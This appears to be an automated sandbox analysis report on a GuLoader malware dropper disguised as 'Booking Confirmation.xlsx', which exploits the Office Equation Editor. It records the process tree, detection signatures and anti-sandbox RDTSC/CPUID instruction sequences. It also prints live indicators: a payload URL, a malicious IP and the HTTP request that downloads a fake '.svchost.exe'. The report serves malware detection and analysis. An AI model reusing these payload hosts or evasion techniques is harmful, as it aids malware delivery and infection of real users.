
Windows Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name: Booking Confirmation.xlsx
Analysis ID: 448719
MD5: 870a4c72bccd58de144c7b845d56c626
SHA1: 482681f75180bbb1286e1f93ce44dfae0b6b0007
SHA256: 37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2668 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3056 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2552 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\Public\vbc.exe | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.vbc.exe.400000.0.unpack | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |
6.0.vbc.exe.400000.0.unpack | JoeSecurity_GuLoader_1 | Yara detected GuLoader | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3056, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3056, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2552
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3056, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2552

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://180.214.239.39/port/.svchost.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
Source: excel.exe | Memory has grown: Private usage: 4MB later: 72MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 14 Jul 2021 14:55:35 GMT; Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28; Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT; ETag: "41470-5c7043f493d18"; Accept-Ranges: bytes; Content-Length: 267376; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic | HTTP traffic detected: GET /port/.svchost.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 180.214.239.39; Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: 3E10AF3D.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr | String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A54E7 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A55AC NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A54E7
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A7036
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A100E
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A4071
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A80D4
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A2940
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A2958
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A29B0
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A2183
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A42CD
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A72C3
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A1B2D
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A1B1A
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A7B73
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A1B5F
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A4B8E
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A8385
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A43F1
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A341B
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A844C
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A8C82
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A34C4
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A8CD5
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A350F
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A8D58
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A7D52
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A0EFE
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A3F0C
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A7F03
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A7F6D
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A0FB5
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A4785
Source: C:\Users\Public\vbc.exe | Code function: 6_2_002A2793
Source: Booking Confirmation.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: .svchost[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE916.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Booking Confirmation.xlsx | Static file information: File size 1221992 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
Source: Booking Confirmation.xlsx | Initial sample: OLE indicators vbamacros = False
Source: Booking Confirmation.xlsx | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match | File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0040495E push es; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00221774 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00221023 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00222823 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00224023 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00227024 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00225825 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00224833 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00223033 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00221833 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00226034 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00220038 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00224803 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00223003 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00221803 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00226004 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00220008 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00223813 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00225013 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00222014 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00226814 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00220818 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00223063 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00221863 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00224863 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00226065 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00220068 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00222074 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00223874 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00225074 push edx; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00226875 push edx; ret
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
Source: Booking Confirmation.xlsx | Stream path 'EncryptedPackage' entropy: 7.99865188998 (max. 8.0)

                Malware Analysis System Evasion:

                Contains functionality to detect hardware virtualization (CPUID execution measurement)
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7036
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A100E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4071
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2958
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A42CD
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B1A
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B5F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A43F1
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A341B
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7D52
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0EFE
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0FB5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6F9E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2793
                Detected RDTSC dummy instruction sequence (likely for instruction hammering)
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A01BE second address: 00000000002A01BE instructions:
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A70C1 second address: 00000000002A70D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DB2 second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A8DFF second address: 00000000002A8DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007F03A0E2C8FFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
                Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002A7A0D second address: 00000000002A7A0D instructions:
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7 rdtsc
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2280Thread sleep time: -60000s >= -30000s
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7 rdtsc
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A50CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2958 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A71A9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A6B93 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A341B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7D52 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: vbc.exe, 00000006.00000002.2365906619.0000000000880000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2183 cpuid
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 12 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 31 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 11 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 121 | SIM Card Swap | Carrier Billing Fraud |
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 313 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

                Behavior Graph


                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 7% | ReversingLabs | Win32.Trojan.Vebzenpak
                C:\Users\Public\vbc.exe | 7% | ReversingLabs | Win32.Trojan.Vebzenpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                Source | Detection | Scanner | Label
                http://ceattire.com/bin_UYDMbHwI28.bin | 0% | Avira URL Cloud | safe
                http://180.214.239.39/port/.svchost.exe | 100% | Avira URL Cloud | malware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://ceattire.com/bin_UYDMbHwI28.bin | true | Avira URL Cloud: safe | unknown
                http://180.214.239.39/port/.svchost.exe | true | Avira URL Cloud: malware | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
